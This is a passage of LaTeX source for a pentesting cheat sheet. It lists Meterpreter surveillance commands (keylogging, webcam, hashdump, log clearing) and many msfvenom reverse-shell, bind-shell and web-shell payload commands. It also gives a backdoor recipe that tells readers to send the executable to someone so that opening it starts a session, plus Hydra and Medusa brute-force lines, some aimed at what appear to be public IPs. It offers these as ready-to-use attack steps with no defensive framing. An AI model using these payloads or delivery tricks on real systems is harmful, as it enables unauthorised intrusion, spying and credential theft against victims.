(+ 2) pry Open the Pry debugger on the current session \newline % Row Count 14 (+ 2) quit Terminate the meterpreter session \newline % Row Count 16 (+ 2) read Reads data from a channel \newline % Row Count 18 (+ 2) resource Run the commands stored in a file \newline % Row Count 20 (+ 2) run Executes a meterpreter script or Post module \newline % Row Count 22 (+ 2) secure (Re)Negotiate TLV packet encryption on the session \newline % Row Count 24 (+ 2) sessions Quickly switch to another session \newline % Row Count 26 (+ 2) set\_timeouts Set the current session timeout values \newline % Row Count 28 (+ 2) sleep Force Meterpreter to go quiet, then re-establish session. \newline % Row Count 30 (+ 2) } \tn \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{17.67cm}{X} \SetRowColor{DarkBackground} \mymulticolumn{1}{x{17.67cm}}{\bf\textcolor{white}{linux basics and easy pentesting tutorials (cont)}} \tn \SetRowColor{white} \mymulticolumn{1}{x{17.67cm}}{ transport Change the current transport mechanism \newline % Row Count 2 (+ 2) use Deprecated alias for "load" \newline % Row Count 4 (+ 2) uuid Get the UUID for the current session \newline % Row Count 6 (+ 2) write Writes data to a channel \newline % Row Count 8 (+ 2) Stdapi: File system Commands \newline % Row Count 9 (+ 1) \seqsplit{============================} \newline % Row Count 10 (+ 1) Command Description \newline % Row Count 11 (+ 1) -{}-{}-{}-{}-{}-{}- -{}-{}-{}-{}-{}-{}-{}-{}-{}-- \newline % Row Count 12 (+ 1) cat Read the contents of a file to the screen \newline % Row Count 14 (+ 2) cd Change directory \newline % Row Count 15 (+ 1) checksum Retrieve the checksum of a file \newline % Row Count 16 (+ 1) cp Copy source to destination \newline % Row Count 17 (+ 1) dir List files (alias for ls) \newline % Row Count 18 (+ 1) download Download a file or directory \newline % Row Count 19 (+ 1) edit Edit a file \newline % Row Count 20 (+ 1) getlwd Print local working directory \newline % Row Count 21 (+ 1) getwd Print working directory \newline % Row Count 22 (+ 1) lcd Change local working directory \newline % Row Count 23 (+ 1) lls List local files \newline % Row Count 24 (+ 1) lpwd Print local working directory \newline % Row Count 25 (+ 1) ls List files \newline % Row Count 26 (+ 1) mkdir Make directory \newline % Row Count 27 (+ 1) mv Move source to destination \newline % Row Count 28 (+ 1) pwd Print working directory \newline % Row Count 29 (+ 1) rm Delete the specified file \newline % Row Count 30 (+ 1) } \tn \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{17.67cm}{X} \SetRowColor{DarkBackground} \mymulticolumn{1}{x{17.67cm}}{\bf\textcolor{white}{linux basics and easy pentesting tutorials (cont)}} \tn \SetRowColor{white} \mymulticolumn{1}{x{17.67cm}}{ rmdir Remove directory \newline % Row Count 1 (+ 1) search Search for files \newline % Row Count 2 (+ 1) show\_mount List all mount points/logical drives \newline % Row Count 4 (+ 2) upload Upload a file or directory \newline % Row Count 5 (+ 1) Stdapi: Networking Commands \newline % Row Count 6 (+ 1) \seqsplit{===========================} \newline % Row Count 7 (+ 1) Command Description \newline % Row Count 8 (+ 1) -{}-{}-{}-{}-{}-{}- -{}-{}-{}-{}-{}-{}-{}-{}-{}-- \newline % Row Count 9 (+ 1) arp Display the host ARP cache \newline % Row Count 10 (+ 1) getproxy Display the current proxy configuration \newline % Row Count 12 (+ 2) ifconfig Display interfaces \newline % Row Count 13 (+ 1) ipconfig Display interfaces \newline % Row Count 14 (+ 1) netstat Display the network connections \newline % Row Count 15 (+ 1) portfwd Forward a local port to a remote service \newline % Row Count 17 (+ 2) resolve Resolve a set of host names on the target \newline % Row Count 19 (+ 2) route View and modify the routing table \newline % Row Count 21 (+ 2) Stdapi: User interface Commands \newline % Row Count 22 (+ 1) Command Description \newline % Row Count 23 (+ 1) -{}-{}-{}-{}-{}-{}- -{}-{}-{}-{}-{}-{}-{}-{}-{}-- \newline % Row Count 24 (+ 1) enumdesktops List all accessible desktops and window stations \newline % Row Count 26 (+ 2) getdesktop Get the current meterpreter desktop \newline % Row Count 28 (+ 2) idletime Returns the number of seconds the remote user has been idle \newline % Row Count 30 (+ 2) } \tn \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{17.67cm}{X} \SetRowColor{DarkBackground} \mymulticolumn{1}{x{17.67cm}}{\bf\textcolor{white}{linux basics and easy pentesting tutorials (cont)}} \tn \SetRowColor{white} \mymulticolumn{1}{x{17.67cm}}{ keyboard\_send Send keystrokes \newline % Row Count 1 (+ 1) keyevent Send key events \newline % Row Count 2 (+ 1) keyscan\_dump Dump the keystroke buffer \newline % Row Count 3 (+ 1) keyscan\_start Start capturing keystrokes \newline % Row Count 4 (+ 1) keyscan\_stop Stop capturing keystrokes \newline % Row Count 5 (+ 1) mouse Send mouse events \newline % Row Count 6 (+ 1) screenshare Watch the remote user's desktop in real time \newline % Row Count 8 (+ 2) screenshot Grab a screenshot of the interactive desktop \newline % Row Count 10 (+ 2) setdesktop Change the meterpreters current desktop \newline % Row Count 12 (+ 2) uictl Control some of the user interface components \newline % Row Count 14 (+ 2) Stdapi: System Commands \newline % Row Count 15 (+ 1) ======================= \newline % Row Count 16 (+ 1) Command Description \newline % Row Count 17 (+ 1) -{}-{}-{}-{}-{}-{}- -{}-{}-{}-{}-{}-{}-{}-{}-{}-- \newline % Row Count 18 (+ 1) clearev Clear the event log \newline % Row Count 19 (+ 1) drop\_token Relinquishes any active impersonation token. \newline % Row Count 21 (+ 2) execute Execute a command \newline % Row Count 22 (+ 1) getenv Get one or more environment variable values \newline % Row Count 24 (+ 2) getpid Get the current process identifier \newline % Row Count 26 (+ 2) getprivs Attempt to enable all privileges available to the current process \newline % Row Count 28 (+ 2) getsid Get the SID of the user that the server is running as \newline % Row Count 30 (+ 2) } \tn \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{17.67cm}{X} \SetRowColor{DarkBackground} \mymulticolumn{1}{x{17.67cm}}{\bf\textcolor{white}{linux basics and easy pentesting tutorials (cont)}} \tn \SetRowColor{white} \mymulticolumn{1}{x{17.67cm}}{ getuid Get the user that the server is running as \newline % Row Count 2 (+ 2) kill Terminate a process \newline % Row Count 3 (+ 1) localtime Displays the target system's local date and time \newline % Row Count 5 (+ 2) pgrep Filter processes by name \newline % Row Count 6 (+ 1) pkill Terminate processes by name \newline % Row Count 7 (+ 1) ps List running processes \newline % Row Count 8 (+ 1) reboot Reboots the remote computer \newline % Row Count 9 (+ 1) reg Modify and interact with the remote registry \newline % Row Count 11 (+ 2) rev2self Calls RevertToSelf() on the remote machine \newline % Row Count 13 (+ 2) shell Drop into a system command shell \newline % Row Count 15 (+ 2) shutdown Shuts down the remote computer \newline % Row Count 16 (+ 1) steal\_token Attempts to steal an impersonation token from the target process \newline % Row Count 18 (+ 2) suspend Suspends or resumes a list of processes \newline % Row Count 20 (+ 2) sysinfo Gets information about the remote system, such as OS \newline % Row Count 22 (+ 2) Stdapi: Webcam Commands \newline % Row Count 23 (+ 1) ======================= \newline % Row Count 24 (+ 1) Command Description \newline % Row Count 25 (+ 1) -{}-{}-{}-{}-{}-{}- -{}-{}-{}-{}-{}-{}-{}-{}-{}-- \newline % Row Count 26 (+ 1) record\_mic Record audio from the default microphone for X seconds \newline % Row Count 28 (+ 2) webcam\_chat Start a video chat \newline % Row Count 29 (+ 1) webcam\_list List webcams \newline % Row Count 30 (+ 1) } \tn \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{17.67cm}{X} \SetRowColor{DarkBackground} \mymulticolumn{1}{x{17.67cm}}{\bf\textcolor{white}{linux basics and easy pentesting tutorials (cont)}} \tn \SetRowColor{white} \mymulticolumn{1}{x{17.67cm}}{ webcam\_snap Take a snapshot from the specified webcam \newline % Row Count 2 (+ 2) webcam\_stream Play a video stream from the specified webcam \newline % Row Count 4 (+ 2) Stdapi: Audio Output Commands \newline % Row Count 5 (+ 1) \seqsplit{=============================} \newline % Row Count 6 (+ 1) Command Description \newline % Row Count 7 (+ 1) -{}-{}-{}-{}-{}-{}- -{}-{}-{}-{}-{}-{}-{}-{}-{}-- \newline % Row Count 8 (+ 1) play play a waveform audio file (.wav) on the target system \newline % Row Count 10 (+ 2) Priv: Elevate Commands \newline % Row Count 11 (+ 1) ====================== \newline % Row Count 12 (+ 1) Command Description \newline % Row Count 13 (+ 1) -{}-{}-{}-{}-{}-{}- -{}-{}-{}-{}-{}-{}-{}-{}-{}-- \newline % Row Count 14 (+ 1) getsystem Attempt to elevate your privilege to that of local system. \newline % Row Count 16 (+ 2) Priv: Password database Commands \newline % Row Count 17 (+ 1) \seqsplit{================================} \newline % Row Count 18 (+ 1) Command Description \newline % Row Count 19 (+ 1) -{}-{}-{}-{}-{}-{}- -{}-{}-{}-{}-{}-{}-{}-{}-{}-- \newline % Row Count 20 (+ 1) hashdump Dumps the contents of the SAM database \newline % Row Count 22 (+ 2) Priv: Timestomp Commands \newline % Row Count 23 (+ 1) ======================== \newline % Row Count 24 (+ 1) Command Description \newline % Row Count 25 (+ 1) -{}-{}-{}-{}-{}-{}- -{}-{}-{}-{}-{}-{}-{}-{}-{}-- \newline % Row Count 26 (+ 1) timestomp Manipulate file MACE attributes \newline % Row Count 27 (+ 1) Creating an executable backdoor with Metasploit: \newline % Row Count 28 (+ 1) "msfvenom -p \seqsplit{windows/meterpreter/reverse\_tcp} LHOST=192.168.3.141 LPORT=4444 -f exe -o payload.exe" \newline % Row Count 30 (+ 2) } \tn \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{17.67cm}{X} \SetRowColor{DarkBackground} \mymulticolumn{1}{x{17.67cm}}{\bf\textcolor{white}{linux basics and easy pentesting tutorials (cont)}} \tn \SetRowColor{white} \mymulticolumn{1}{x{17.67cm}}{The backdoor.exe file is saved in the path where you executed the command. Upload this file to GitHub or send it to someone, once they open it, your meterpreter session will start \newline % Row Count 4 (+ 4) LHOST= Your IP \newline % Row Count 5 (+ 1) RHOST= Target IP \newline % Row Count 6 (+ 1) List payloads: \newline % Row Count 7 (+ 1) "msfvenom -l" \newline % Row Count 8 (+ 1) Linux Meterpreter Reverse Shell: \newline % Row Count 9 (+ 1) "msfvenom -p \seqsplit{linux/x86/meterpreter/reverse\_tcp} LHOST=\textless{}Local IP Address\textgreater{} LPORT=\textless{}Local Port\textgreater{} -f elf \textgreater{} shell.elf" \newline % Row Count 12 (+ 3) Linux Bind Meterpreter Shell: \newline % Row Count 13 (+ 1) "msfvenom -p \seqsplit{linux/x86/meterpreter/bind\_tcp} RHOST=\textless{}Remote IP Address\textgreater{} LPORT=\textless{}Local Port\textgreater{} -f elf \textgreater{} bind.elf" \newline % Row Count 16 (+ 3) Linux Bind Shell: \newline % Row Count 17 (+ 1) "msfvenom -p generic/shell\_bind\_tcp RHOST=\textless{}Remote IP Address\textgreater{} LPORT=\textless{}Local Port\textgreater{} -f elf \textgreater{} term.elf" \newline % Row Count 20 (+ 3) Windows Meterpreter Reverse TCP Shell: \newline % Row Count 21 (+ 1) "msfvenom -p \seqsplit{windows/meterpreter/reverse\_tcp} LHOST=\textless{}Local IP Address\textgreater{} LPORT=\textless{}Local Port\textgreater{} -f exe \textgreater{} shell.exe" \newline % Row Count 24 (+ 3) Windows Reverse TCP Shell: \newline % Row Count 25 (+ 1) "msfvenom -p \seqsplit{windows/shell/reverse\_tcp} LHOST=\textless{}Local IP Address\textgreater{} LPORT=\textless{}Local Port\textgreater{} -f exe \textgreater{} shell.exe" \newline % Row Count 28 (+ 3) Windows Encoded Meterpreter Windows Reverse Shell: \newline % Row Count 30 (+ 2) } \tn \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{17.67cm}{X} \SetRowColor{DarkBackground} \mymulticolumn{1}{x{17.67cm}}{\bf\textcolor{white}{linux basics and easy pentesting tutorials (cont)}} \tn \SetRowColor{white} \mymulticolumn{1}{x{17.67cm}}{ "msfvenom -p \seqsplit{windows/meterpreter/reverse\_tcp} -e shikata\_ga\_nai -i 3 -f exe \textgreater{} encoded.exe" \newline % Row Count 2 (+ 2) Mac Reverse Shell: \newline % Row Count 3 (+ 1) "msfvenom -p \seqsplit{osx/x86/shell\_reverse\_tcp} LHOST=\textless{}Local IP Address\textgreater{} LPORT=\textless{}Local Port\textgreater{} -f macho \textgreater{} shell.macho" \newline % Row Count 6 (+ 3) Mac Bind Shell: \newline % Row Count 7 (+ 1) "msfvenom -p osx/x86/shell\_bind\_tcp RHOST=\textless{}Remote IP Address\textgreater{} LPORT=\textless{}Local Port\textgreater{} -f macho \textgreater{} bind.macho" \newline % Row Count 10 (+ 3) Web Payloads: \newline % Row Count 11 (+ 1) PHP Meterpreter Reverse TCP \newline % Row Count 12 (+ 1) msfvenom -p \seqsplit{php/meterpreter\_reverse\_tcp} LHOST=\textless{}Local IP Address\textgreater{} LPORT=\textless{}Local Port\textgreater{} -f raw \textgreater{} shell.php \newline % Row Count 15 (+ 3) cat shell.php | pbcopy \&\& echo '\textless{}?php ' | tr -d '\textbackslash{}n' \textgreater{} shell.php \&\& pbpaste \textgreater{}\textgreater{} shell.php \newline % Row Count 17 (+ 2) ASP Meterpreter Reverse TCP \newline % Row Count 18 (+ 1) msfvenom -p \seqsplit{windows/meterpreter/reverse\_tcp} LHOST=\textless{}Local IP Address\textgreater{} LPORT=\textless{}Local Port\textgreater{} -f asp \textgreater{} shell.asp \newline % Row Count 21 (+ 3) JSP Java Meterpreter Reverse TCP \newline % Row Count 22 (+ 1) msfvenom -p \seqsplit{java/jsp\_shell\_reverse\_tcp} LHOST=\textless{}Local IP Address\textgreater{} LPORT=\textless{}Local Port\textgreater{} -f raw \textgreater{} shell.jsp \newline % Row Count 25 (+ 3) WAR \newline % Row Count 26 (+ 1) msfvenom -p \seqsplit{java/jsp\_shell\_reverse\_tcp} LHOST=\textless{}Local IP Address\textgreater{} LPORT=\textless{}Local Port\textgreater{} -f war \textgreater{} shell.war \newline % Row Count 29 (+ 3) Scripting Payloads \newline % Row Count 30 (+ 1) } \tn \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{17.67cm}{X} \SetRowColor{DarkBackground} \mymulticolumn{1}{x{17.67cm}}{\bf\textcolor{white}{linux basics and easy pentesting tutorials (cont)}} \tn \SetRowColor{white} \mymulticolumn{1}{x{17.67cm}}{Python Reverse Shell \newline % Row Count 1 (+ 1) msfvenom -p cmd/unix/reverse\_python LHOST=\textless{}Local IP Address\textgreater{} LPORT=\textless{}Local Port\textgreater{} -f raw \textgreater{} shell.py \newline % Row Count 3 (+ 2) Bash Unix Reverse Shell \newline % Row Count 4 (+ 1) msfvenom -p cmd/unix/reverse\_bash LHOST=\textless{}Local IP Address\textgreater{} LPORT=\textless{}Local Port\textgreater{} -f raw \textgreater{} shell.sh \newline % Row Count 6 (+ 2) Perl Unix Reverse shell \newline % Row Count 7 (+ 1) msfvenom -p cmd/unix/reverse\_perl LHOST=\textless{}Local IP Address\textgreater{} LPORT=\textless{}Local Port\textgreater{} -f raw \textgreater{} shell.pl \newline % Row Count 9 (+ 2) Shellcode \newline % Row Count 10 (+ 1) Windows Meterpreter Reverse TCP Shellcode \newline % Row Count 11 (+ 1) msfvenom -p \seqsplit{windows/meterpreter/reverse\_tcp} LHOST=\textless{}Local IP Address\textgreater{} LPORT=\textless{}Local Port\textgreater{} -f \textless{}language\textgreater{} \newline % Row Count 14 (+ 3) Linux Meterpreter Reverse TCP Shellcode \newline % Row Count 15 (+ 1) msfvenom -p \seqsplit{linux/x86/meterpreter/reverse\_tcp} LHOST=\textless{}Local IP Address\textgreater{} LPORT=\textless{}Local Port\textgreater{} -f \textless{}language\textgreater{} \newline % Row Count 18 (+ 3) Mac Reverse TCP Shellcode \newline % Row Count 19 (+ 1) msfvenom -p \seqsplit{osx/x86/shell\_reverse\_tcp} LHOST=\textless{}Local IP Address\textgreater{} LPORT=\textless{}Local Port\textgreater{} -f \textless{}language\textgreater{} \newline % Row Count 21 (+ 2) Create User \newline % Row Count 22 (+ 1) msfvenom -p windows/adduser USER=hacker PASS=Hacker123\$ -f exe \textgreater{} adduser.exe \newline % Row Count 24 (+ 2) Metasploit Handler: \newline % Row Count 25 (+ 1) use exploit/multi/handler \newline % Row Count 26 (+ 1) set PAYLOAD \textless{}Payload name\textgreater{} \newline % Row Count 27 (+ 1) Set RHOST \textless{}Remote IP\textgreater{} \newline % Row Count 28 (+ 1) set LHOST \textless{}Local IP\textgreater{} \newline % Row Count 29 (+ 1) set LPORT \textless{}Local Port\textgreater{} \newline % Row Count 30 (+ 1) } \tn \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{17.67cm}{X} \SetRowColor{DarkBackground} \mymulticolumn{1}{x{17.67cm}}{\bf\textcolor{white}{linux basics and easy pentesting tutorials (cont)}} \tn \SetRowColor{white} \mymulticolumn{1}{x{17.67cm}}{ Run \newline % Row Count 1 (+ 1) msf\textgreater{} use multi/handler \newline % Row Count 2 (+ 1) msf exploit(handler) \textgreater{} set RHOST \textless{}remote IP\textgreater{} \newline % Row Count 3 (+ 1) msf exploit(handler) \textgreater{} set payload \seqsplit{windows/meterpreter/reverse\_tcp} \newline % Row Count 5 (+ 2) msf exploit(handler) \textgreater{} set LHOST \textless{}Listening\_IP\textgreater{} \newline % Row Count 6 (+ 1) msf exploit(handler) \textgreater{} set LPORT \textless{}Listening\_Port\textgreater{} \newline % Row Count 7 (+ 1) msf exploit(handler) \textgreater{} exploit \newline % Row Count 8 (+ 1) {[}*{]} Started reverse handler on 192.168.75.35:4444 \newline % Row Count 9 (+ 1) {[}*{]} Starting the payload handler… \newline % Row Count 10 (+ 1) SSH User Enumeration in Metasploit: \newline % Row Count 11 (+ 1) \seqsplit{AUXILIARY/SCANNER/SSH/SSH\_ENUMUSERS} \newline % Row Count 12 (+ 1) \textgreater{}set RHOSTS \textless{}target\textgreater{} \newline % Row Count 13 (+ 1) \textgreater{}set USERNAME admin \newline % Row Count 14 (+ 1) \textgreater{}run \newline % Row Count 15 (+ 1) \seqsplit{===========================================================================================================================} \newline % Row Count 18 (+ 3) Netcat: \newline % Row Count 19 (+ 1) Basic Chat Server: \newline % Row Count 20 (+ 1) On Your first machine type: \newline % Row Count 21 (+ 1) "nc -l 2222" \newline % Row Count 22 (+ 1) This will simply listen on port 2222 for any incoming data. On another machine run: \newline % Row Count 24 (+ 2) "nc 192.168.0.31 2222" \newline % Row Count 25 (+ 1) Next, type anything at all such e.g. "hello world!" and you'll see it echo'd on the listener's shell. Any text entered into either of the shells ends up being displayed on the other machine also. \newline % Row Count 29 (+ 4) File transfer - from the server side (listener): \newline % Row Count 30 (+ 1) } \tn \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{17.67cm}{X} \SetRowColor{DarkBackground} \mymulticolumn{1}{x{17.67cm}}{\bf\textcolor{white}{linux basics and easy pentesting tutorials (cont)}} \tn \SetRowColor{white} \mymulticolumn{1}{x{17.67cm}}{ we'll transfer a file from one box (the server) to another box (the client). So as soon as the server receives a connection, the file gets transferred. On the machine where the file exists run the following command: \newline % Row Count 5 (+ 5) "nc -l 2222 \textless{} filename \textgreater{}" \newline % Row Count 6 (+ 1) On the box where you'd like to receive the file, run: \newline % Row Count 8 (+ 2) "nc 192.168.0.31 2222 \textgreater{} any\_file\_name" \newline % Row Count 9 (+ 1) Note that if you don't point the data to any\_filename, the data will just be displayed in the shell at the receiving end. Also, obviously the receiving file any\_file\_name can be any file name (but is normally the same as the original). \newline % Row Count 14 (+ 5) If you wanted to append the contents of filename to an already existing any\_filename, you could use this instead: \newline % Row Count 17 (+ 3) "nc 192.168.0.31 2222 \textgreater{}\textgreater{} any\_file\_name" \newline % Row Count 18 (+ 1) Note the '\textgreater{}\textgreater{}' rather than just a single '\textgreater{}' (the '\textgreater{}\textgreater{}' appends while the \textgreater{} replaces). \newline % Row Count 20 (+ 2) File transfer - from the client side \newline % Row Count 21 (+ 1) To transfer a file in the opposite direction use: \newline % Row Count 22 (+ 1) "nc -l 2222 \textgreater{} file\_copy" \newline % Row Count 23 (+ 1) On the client side (sender in this case) use: \newline % Row Count 24 (+ 1) "cat file\_to\_send | nc 192.168.0.31 2222" \newline % Row Count 25 (+ 1) To keep the listening open for further data, use the the -k option: \newline % Row Count 27 (+ 2) "nc -lk 2222 \textgreater{}\textgreater{} file" \newline % Row Count 28 (+ 1) \seqsplit{===========================================================================================================================} \newline % Row Count 31 (+ 3) } \tn \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{17.67cm}{X} \SetRowColor{DarkBackground} \mymulticolumn{1}{x{17.67cm}}{\bf\textcolor{white}{linux basics and easy pentesting tutorials (cont)}} \tn \SetRowColor{white} \mymulticolumn{1}{x{17.67cm}}{Python server for when you want to transfer a file \newline % Row Count 2 (+ 2) sudo python3 -m http.server 80 \newline % Row Count 3 (+ 1) \seqsplit{===========================================================================================================================} \newline % Row Count 6 (+ 3) Crunch Wordlist: \newline % Row Count 7 (+ 1) crunch 4 4 012345abcdef -o Documents/pass.txt \newline % Row Count 8 (+ 1) \seqsplit{===========================================================================================================================} \newline % Row Count 11 (+ 3) Hydra: \newline % Row Count 12 (+ 1) Install hydra with the following commands: \newline % Row Count 13 (+ 1) \$ git clone \seqsplit{https://github.com/vanhauser-thc/thc-hydra.git} \newline % Row Count 15 (+ 2) \$ cd thc-hydra/ \newline % Row Count 16 (+ 1) \$ ./configure \newline % Row Count 17 (+ 1) \$ make \newline % Row Count 18 (+ 1) \$ make install \newline % Row Count 19 (+ 1) hydra -l admin -P \seqsplit{/home/kali/htb/nineveh/10k} 10.10.10.43 http-post-form "/department/login.php:username=\textasciicircum{}user\textasciicircum{}\&password=\textasciicircum{}PASS\textasciicircum{}:Invalid" -t 64 \newline % Row Count 22 (+ 3) hydra -l root -p admin 69.167.51.201 -t 4 ssh \newline % Row Count 23 (+ 1) hydra -l root -P \seqsplit{/usr/share/wordlists/metasploit/piata\_ssh\_userpass}.txt 69.167.51.201 -t 4 \newline % Row Count 25 (+ 2) \seqsplit{===========================================================================================================================} \newline % Row Count 28 (+ 3) Medusa: \newline % Row Count 29 (+ 1) "medusa -h 192.168.1.1 -u "admin" -P hugewordlist.txt -M http" \newline % Row Count 31 (+ 2) } \tn \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{17.67cm}{X} \SetRowColor{DarkBackground} \mymulticolumn{1}{x{17.67cm}}{\bf\textcolor{white}{linux basics and easy pentesting tutorials (cont)}} \tn \SetRowColor{white} \mymulticolumn{1}{x{17.67cm}}{ -h {[}TARGET{]} \newline % Row Count 1 (+ 1) Target hostname or IP address. \newline % Row Count 2 (+ 1) -H {[}FILE{]} \newline % Row Count 3 (+ 1) Reads target specifications from the file specified rather than from the command line. The file should contain a list separated by newlines. \newline % Row Count 6 (+ 3) -u {[}TARGET{]} \newline % Row Count 7 (+ 1) Target username. \newline % Row Count 8 (+ 1) -U {[}FILE{]} \newline % Row Count 9 (+ 1) Reads target usernames from the file specified rather than from the command line. The file should contain a list separated by newlines. \newline % Row Count 12 (+ 3) -p {[}TARGET{]} \newline % Row Count 13 (+ 1) Target password. \newline % Row Count 14 (+ 1) -P {[}FILE{]} \newline % Row Count 15 (+ 1) Reads target passwords from the file specified rather than from the command line. The file should contain a list separated by newlines. \newline % Row Count 18 (+ 3) -C {[}FILE{]} \newline % Row Count 19 (+ 1) File containing combo entries. Combo files are colon separated and in the following format: host:user:password. If any of the three fields are left empty, the respective information should be provided either as a single global value or as a list in a file. \newline % Row Count 25 (+ 6) -O {[}FILE{]} \newline % Row Count 26 (+ 1) File to append log information to. Medusa will log all accounts credentials found to be valid or cause an unknown error. It will also log the start and stop times of an audit, along with the calling parameters. \newline % Row Count 31 (+ 5) } \tn \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{17.67cm}{X} \SetRowColor{DarkBackground} \mymulticolumn{1}{x{17.67cm}}{\bf\textcolor{white}{linux basics and easy pentesting tutorials (cont)}} \tn \SetRowColor{white} \mymulticolumn{1}{x{17.67cm}}{-e {[}n/s/ns{]} \newline % Row Count 1 (+ 1) Additional password checks ({[}n{]} No Password, {[}s{]} Password = Username). If both options are being used, they should be specified together ("-e ns"). If only a single option is being called use either "-e n" or "-e s". \newline % Row Count 6 (+ 5) -M {[}TEXT{]} \newline % Row Count 7 (+ 1) Name of the module to execute (without the .mod extension). \newline % Row Count 9 (+ 2) -m {[}TEXT{]} \newline % Row Count 10 (+ 1) Parameter to pass to the module. This can be passed multiple times with a different parameter each time and they will all be sent to the module (i.e. -m Param1 -m Param2, etc.) \newline % Row Count 14 (+ 4) -d \newline % Row Count 15 (+ 1) Dump all known modules. \newline % Row Count 16 (+ 1) -n {[}NUM{]} \newline % Row Count 17 (+ 1) Use for non-default TCP port number. \newline % Row Count 18 (+ 1) -s \newline % Row Count 19 (+ 1) Enable SSL. \newline % Row Count 20 (+ 1) -g {[}NUM{]} \newline % Row Count 21 (+ 1) Give up after trying to connect for NUM seconds (default 3). \newline % Row Count 23 (+ 2) -r {[}NUM{]} \newline % Row Count 24 (+ 1) Sleep NUM seconds between retry attempts (default 3). \newline % Row Count 26 (+ 2) -R {[}NUM{]} \newline % Row Count 27 (+ 1) Attempt NUM retries before giving up. The total number of attempts will be NUM + 1. \newline % Row Count 29 (+ 2) -t {[}NUM{]} \newline % Row Count 30 (+ 1) } \tn \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{17.67cm}{X} \SetRowColor{DarkBackground} \mymulticolumn{1}{x{17.67cm}}{\bf\textcolor{white}{linux basics and easy pentesting tutorials (cont)}} \tn \SetRowColor{white} \mymulticolumn{1}{x{17.67cm}}{Total number of logins to be tested concurrently. It should be noted that rougly t x T threads could be running at any one time. 381 appears to be the limit on my fairly boring Gentoo Linux host. \newline % Row Count 4 (+ 4) -T {[}NUM{]} \newline % Row Count 5 (+ 1) Total number of hosts to be tested concurrently. \newline % Row Count 6 (+ 1) -L \newline % Row Count 7 (+ 1) Parallelize logins using one username per thread. The default is to process the entire username before proceeding. \newline % Row Count 10 (+ 3) -f \newline % Row Count 11 (+ 1) Stop scanning host after first valid username/password found. \newline % Row Count 13 (+ 2) -F \newline % Row Count 14 (+ 1) Stop audit after first valid username/password found on any host. \newline % Row Count 16 (+ 2) -b \newline % Row Count 17 (+ 1) Suppress startup banner \newline % Row Count 18 (+ 1) -q \newline % Row Count 19 (+ 1) Display module's usage information. This should be used in conjunction with the "-M" option. For example, "medusa -M smbnt -q". \newline % Row Count 22 (+ 3) -v {[}NUM{]} \newline % Row Count 23 (+ 1) Verbose level {[}0 - 6 (more){]}. All messages at or below the specified level will be displayed. The default level is 5. \newline % Row Count 26 (+ 3) -w {[}NUM{]} \newline % Row Count 27 (+ 1) Error debug level {[}0 - 10 (more){]}. All messages at or below the specified level will be displayed. The default level is 5. \newline % Row Count 30 (+ 3) } \tn \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{17.67cm}{X} \SetRowColor{DarkBackground} \mymulticolumn{1}{x{17.67cm}}{\bf\textcolor{white}{linux basics and easy pentesting tutorials (cont)}} \tn \SetRowColor{white} \mymulticolumn{1}{x{17.67cm}}{-V \newline % Row Count 1 (+ 1) Display version \newline % Row Count 2 (+ 1) Available Medusa Modules: \newline % Row Count 3 (+ 1) afp.mod : Brute force module for AFP sessions \newline % Row Count 4 (+ 1) cvs.mod : Brute force module for CVS sessions \newline % Row Count 5 (+ 1) ftp.mod : Brute force module for FTP/FTPS sessions \newline % Row Count 7 (+ 2) http.mod : Brute force module for HTTP \newline % Row Count 8 (+ 1) imap.mod : Brute force module for IMAP sessions \newline % Row Count 10 (+ 2) mssql.mod : Brute force module for MSSQL sessions \newline % Row Count 12 (+ 2) mysql.mod : Brute force module for MySQL sessions \newline % Row Count 14 (+ 2) nntp.mod : Brute force module for NNTP sessions \newline % Row Count 16 (+ 2) pcanywhere.mod : Brute force module for PcAnywhere sessions \newline % Row Count 18 (+ 2) pop3.mod : Brute force module for POP3 sessions \newline % Row Count 20 (+ 2) postgres.mod : Brute force module for PostgreSQL sessions \newline % Row Count 22 (+ 2) rdp.mod : Brute force module for RDP (Microsoft Terminal Server) sessions \newline % Row Count 24 (+ 2) rexec.mod : Brute force module for REXEC sessions \newline % Row Count 26 (+ 2) rlogin.mod : Brute force module for RLOGIN sessions \newline % Row Count 28 (+ 2) rsh.mod : Brute force module for RSH sessions \newline % Row Count 29 (+ 1) smbnt.mod : Brute force module for SMB (LM/NTLM/LMv2/NTLMv2) sessions \newline % Row Count 31 (+ 2) } \tn \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{17.67cm}{X} \SetRowColor{DarkBackground} \mymulticolumn{1}{x{17.67cm}}{\bf\textcolor{white}{linux basics and easy pentesting tutorials (cont)}} \tn \SetRowColor{white} \mymulticolumn{1}{x{17.67cm}}{ smtp-vrfy.mod : Brute force module for verifying SMTP accounts (VRFY/EXPN/RCPT TO) \newline % Row Count 2 (+ 2) smtp.mod : Brute force module for SMTP Authentication with TLS \newline % Row Count 4 (+ 2) snmp.mod : Brute force module for SNMP Community Strings \newline % Row Count 6 (+ 2) ssh.mod : Brute force module for SSH v2 sessions \newline % Row Count 8 (+ 2) svn.mod : Brute force module for Subversion sessions \newline % Row Count 10 (+ 2) telnet.mod : Brute force module for telnet sessions \newline % Row Count 12 (+ 2) vmauthd.mod : Brute force module for the VMware Authentication Daemon \newline % Row Count 14 (+ 2) vnc.mod : Brute force module for VNC sessions \newline % Row Count 15 (+ 1) web-form.mod : Brute force module for web form \newline % Row Count 17 (+ 2) wrapper.mod : Generic Wrapper Module \newline % Row Count 18 (+ 1) \seqsplit{===========================================================================================================================} \newline % Row Count 21 (+ 3) SQLmap: \newline % Row Count 22 (+ 1) sqlmap -r search.req -{}-batch -{}-force-ssl \newline % Row Count 23 (+ 1) sqlmap -r login.req -{}-batch -{}-force-ssl461 \newline % Row Count 24 (+ 1) -'search.req = info from search bar results using BurpSuite Repeater using 'Copy to File' \newline % Row Count 26 (+ 